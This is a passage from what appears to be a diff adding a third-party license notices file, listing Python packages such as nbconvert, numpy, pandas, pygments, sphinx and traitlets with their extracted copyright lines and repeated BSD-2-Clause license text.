+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+nbclient 0.5.9 - BSD-2-Clause
+
+
+Copyright (c) IPython Development Team.
+Copyright (c) Jupyter Development Team.
+Copyright (c) 2020-, Jupyter Development Team
+
+Copyright (c) <year> <owner> . All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+   1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+   2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+nbconvert 6.4.0 - BSD-2-Clause
+
+
+Copyright 2011-2016 Twitter, Inc.
+Copyright (c) 2014-2017, PhosphorJS
+Copyright (c) IPython Development Team.
+Copyright (c) Jupyter Development Team.
+copyright 2015- s, Jupyter Development Team
+Copyright (c) 2015-, Jupyter Development Team
+Copyright (c) 2017, Jupyter Development Team.
+Copyright (c) 2014 The IPython Development Team
+Copyright (c) 2001-2015, IPython Development Team
+Copyright (c) 2013, the IPython Development Team.
+Copyright (c) 2016, the IPython Development Team.
+Copyright (c) 2014-2016, Jupyter Development Team.
+Copyright (c) 2014-2017, Jupyter Development Team.
+(c) Ivan Sagalaev <Maniac@SoftwareManiacs.Org> Adapted from GitHub
+
+Copyright (c) <year> <owner> . All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+   1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+   2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+nbformat 5.1.3 - BSD-2-Clause
+
+
+
+Copyright (c) <year> <owner> . All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+   1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+   2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+nest-asyncio 1.5.4 - BSD-2-Clause
+
+
+
+Copyright (c) <year> <owner> . All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+   1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+   2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+numpy 1.22.0 - BSD-2-Clause
+
+
+
+Copyright (c) <year> <owner> . All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+   1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+   2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+pandas 1.3.5 - BSD-2-Clause
+
+
+
+Copyright (c) <year> <owner> . All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+   1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+   2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+prompt-toolkit 3.0.24 - BSD-2-Clause
+
+
+Copyright (c) 2014, Jonathan Slenders
+
+Copyright (c) <year> <owner> . All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+   1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+   2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+pygments 2.11.2 - BSD-2-Clause
+
+
+(c) 2014
+(c) FSF.
+(c) V End
+(c) 2000-2003
+copyright 2006.
+(c) Justin Fletcher
+Copyright 1999-2011
+Copyright 2006-'+date
+(c) openEHR Foundation
+Copyright 2013 Wikimedia
+copyright 2006. Uploaded
+(c) 2015 Andreas Rossberg
+(c) Justin Fletcher, 1998
+Copyright (c) 2006, Manni
+Copyright (c) 1998 Comment
+Copyright (c) 2005-2006 by
+Copyright (c) Rich Hickey.
+Copyright (c) INRIA - Serge
+Copyright 2005 Brian Alliet
+(c) Justin Fletcher, 1998 40
+Copyright 2015 Ruben De Smet
+Copyright (c) 1991, 1992, Jos
+Copyright (c) 2008 Silken Web
+Copyright (c) 2008 Slava Pestov
+Copyright (c) 2015 Georg Brandl
+Copyright 2008, 280 North, Inc.
+(c) Copyright 1999, Artran, Inc.
+Copyright (c) 2009-2010, Gary L.
+Copyright (c) 2014 Fullstack.io.
+copyright (c) 2004 by Andre Simon
+Copyright (c) 2017 Johannes Holzl.
+Copyright 2007-2012 LassoSoft Inc.
+Copyright 1999-2011 Comment Comment
+Copyright 2005 Brian Alliet Comment
+Copyright (c) 2005-2007 Terence Parr
+Copyright 2012-2018 Manas Technology
+Copyright (c) 2009 Benjamin Kowarsch.
+Leaf Corcoran (leafot@gmail.com) 2011
+Copyright (c) 2004, 2005, 2006 Aelitis
+Copyright (c) 2015 DH electronics GmbH
+Copyright 1997 University of Cambridge
+Copyright 2007-2013 by the Sphinx team
+Copyright (c) 2008 Slava Pestov Comment
+Copyright (c) 2009-2010, Gary L. Cutler
+Copyright (c) 2010, Gary L. Cutler, GPL
+Portions (c) International Organization
+Copyright (c) 1997 Borland International
+Copyright (c) 2003, 04 by Johannes Barre
+Copyright (c) 2012-2013 Nenad Rakocevic.
+Copyright 2006-2019 by the Pygments team
+Copyright (c) 1998 the Initial Developer.
+Copyright 2012 Nokia Siemens Networks Oyj
+Copyright (c) 1993-2003 Yukihiro Matsumoto
+(c) 2010 Jeremy Ashkenas, DocumentCloud Inc.
+(c) opyright 2003, MetaQuotes Software Corp.
+Copyright (c) 2009-2010, Gary L. Cutler, GPL
+Copyright (c) 1998-2009, Modelica Association
+Copyright (c) 2008, Brian Frank and Andy Frank
+Copyright (c) 2018 Marek Vasut <marex@denx.de>
+Copyright 1997 University of Cambridge Comment
+Copyright 2006-2014, 2016 by the Pygments team
+Copyright 2006-2014, MetaQuotes Software Corp.
+Copyright 2009-2013, MetaQuotes Software Corp.
+copyright 2006-2014, MetaQuotes Software Corp.
+(c) Name.Entity 1998-2009, Modelica Association
+Copyright (c) 2010, Gary L. Cutler, GPL Comment
+Copyright (c) 1995-2004 Functional Objects, Inc.
+Copyright 2004-2008 Jean Privat <jean@pryen.org>
+Copyright (c) 2005 Free Software Foundation, Inc.
+Copyright 2014 Lucas Bajolet <r4pass@hotmail.com>
+(c) Name.Entity Copyright 2006 by Text Punctuation
+(c) Copyright 2006 by <a href http://mydomain.tld'>
+Copyright (c) 1998,1999,2000,2001,2002 Tal Davidson.
+Copyright (c) 2009-2010, Gary L. Cutler, GPL Comment
+Copyright (c) 1991, Jos van der Woude, jvdwoude@hut.nl
+Copyright 2013 Alexis Laferriere <alexis.laf@xymus.net>
+Copyright 2013 Matthieu Lucas <lucasmatthieu@gmail.com>
+Copyright 2014 Alexis Laferriere <alexis.laf@xymus.net>
+Copyright 2012-2013 Alexis Laferriere <alexis.laf@xymus.net>
+Copyright (c) 2009 The R Foundation for Statistical Computing
+Copyright 1996 Institut National de Recherche en Informatique
+(c) 2000-2003 by cYcnus visit www.cYcnus.de licenser@cYcnus.de
+Copyright (c) 2008 The Regents of the University of California.
+Copyright (c) 1985-1986, 1992, 1994-1995, 1999-2015 Free Software
+Copyright (c) 2000 Information-technology Promotion Agency, Japan
+Copyright (c) 2000 Network Applied Communication Laboratory, Inc.
+Copyright (c) 2011 Nokia Corporation and/or its subsidiary(-ies).
+Copyright (c) 1996, 1997, 1998, 1999, 2000, 2001, 2003, 2004, 2005
+Copyright (c) 2009 The R Foundation for Statistical Computing ISBN
+Copyright 2009-2013, MetaQuotes Software Corp. http://www.mql4.com
+Copyright (c) 1996-2016 by the PostgreSQL Global Development Group.
+Copyright (c) 1994-5 by the Regents of the University of California.
+Copyright (c) 2008-2011 The Regents of the University of California.
+Copyright (c) 1984, 1985, 1988, 2010 Howard Trickey and Oren Patashnik.
+Copyright 2006-2014, MetaQuotes Software Corp. http://www.metaquotes.net
+(c) Copyright 2006 Salvatore Filippone University of Rome Tor Vergata Comment
+Copyright 1996 Institut National de Recherche en Informatique et Comment Comment
+copyright 2006-2014, MetaQuotes Software Corp. property link http://www.mql4.com
+Copyright (c) 1984, 1985, 1988, 2010 Howard Trickey and Oren Patashnik. Unlimited
+Copyright (c) 1985-1986, 1992, 1994-1995, 1999-2015 Free Software Foundation, Inc.
+Copyright (c) 2006 Kashia Buch (kashia@vfemail.net), Fabian Buch (fabian@fabian-buch.de).
+Copyright content Knut Muller, Alexander Wolf, Uwe Ritzschke, Paul-Robert Achcenich, 2006
+Copyright (c) 1984, 1989, 1990, 2000, 2001, 2002, 2003, 2004 Free Software Foundation, Inc.
+Copyright (c) 1996, 1997, 1998, 1999, 2000, 2001, 2003, 2004, 2005 Free Software Foundation, Inc.
+Copyright (c) 1995, 1996, 1997, 1998, 1999, 2000, 2001, 2002, 2003, 2004 Free Software Foundation, Inc.
+(c) Copyright 2006 Salvatore Filippone University of Rome Tor Vergata $ Alfredo Buttari University of Rome Tor Vergata
+Copyright 2012 by Luis Majano and Ortus Solutions, Corp www.gocontentbox.org www.luismajano.com www.ortussolutions.com
+Copyright 2012 by Luis Majano and Ortus Solutions, Corp www.gocontentbox.org www.luismajano.com www.ortussolutions.com Apache License
+
+Copyright (c) <year> <owner> . All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+   1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+   2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+scandir 1.10.0 - BSD-2-Clause
+
+
+Copyright (c) 2012, Ben Hoyt
+
+Copyright (c) <year> <owner> . All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+   1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+   2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+send2trash 1.8.0 - BSD-2-Clause
+
+
+
+Copyright (c) <year> <owner> . All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+   1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+   2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+sphinx 4.3.2 - BSD-2-Clause
+
+
+(c) Ban Quan Suo
+copyright u'2016
+Copyright (c) 2012
+Copyright (c) 2013
+Copyright (c) 2015
+Copyright (c) 2018
+copyright 2006-2009
+(c) 2003 John Gruber
+(copyright)s. (c) Hak
+(copyright)s. (c) Sva
+Copyright Risk Ersatt
+(copyright)s.' (c) Hak
+(copyright)s.' (c) Sva
+(copyright)s. (c) Telif
+Copyright Fare Foreldet
+(copyright)s. (c) Autori
+(copyright)s.' (c) Telif
+Copyright Perill Obsolet
+(copyright)s.' (c) Autori
+Copyright Create Makefile
+Copyright Gefahr Veraltet
+Copyright Perigo Obsoleto
+(c) 2004, 2007 Chad Miller
+(copyright)s. (c) Derechos
+(copyright)s. (c) Ophavsret
+(copyright)s.' (c) Derechos
+Copyright 2008-2009, Haiku.
+Copyright Danger Deprecated
+copyright" Bu Neng Wei Kong
+(copyright)s.' (c) Ophavsret
+Copyright Pericolo Deprecato
+Copyright Arriskua Zaharkitua
+Copyright Error General Index
+copyright (c) 2010 Gunter Milde
+Copyright (copyright)s. Attention
+(copyright)s (copyright)s Makefile
+Copyright 2011-2014 by Sphinx team
+Copyright 2012-2014 by Sphinx team
+Copyright 2007-2019 by the Sphinx team
+Copyright (c) 2010, Georg Brandl & Team
+(c) JS Foundation and other contributors
+copyright 2010-2016, Georg Brandl & Team
+copyright' self.config.copyright, project
+Copyright 2001 by Vivake Gupta <v@nano.com>
+Copyright JS Foundation and other contributors
+Copyright (c) 2008 John Resig, https://jquery.com
+Copyright (c) 2009 Jeremy Ashkenas, DocumentCloud
+Copyright 2008 Societe des arts technologiques (SAT), https://sat.qc.ca
+Copyright (c) 2003 John Gruber (https://daringfireball.net/projects/smartypants/)
+(copyright)s. (copyright)s. pyversion <https://github.com/sphinx-doc/sphinx/issues>
+Copyright (c) 2008 Stefan van der Walt <stefan@mentat.za.net> , Pauli Virtanen <pav@iki.fi>
+Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017 Python Software Foundation
+
+Copyright (c) <year> <owner> . All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+   1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+   2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+terminado 0.12.1 - BSD-2-Clause
+
+
+
+Copyright (c) <year> <owner> . All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+   1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+   2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+tldextract 3.1.2 - BSD-2-Clause
+
+
+
+Copyright (c) <year> <owner> . All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+   1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+   2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+traitlets 5.1.1 - BSD-2-Clause
+
+
+Copyright (c) Enthought, Inc.
+Copyright (c) 2010 Doug Hellmann.
+Copyright 2007-2015 by the Sphinx team
+Copyright (c) IPython Development Team.
+Copyright (c) Jupyter Development Team.
+copyright 2015, The IPython Development Team
+Copyright (c) 2001-, IPython Development Team
+
+Copyright (c) <year> <owner> . All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+   1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
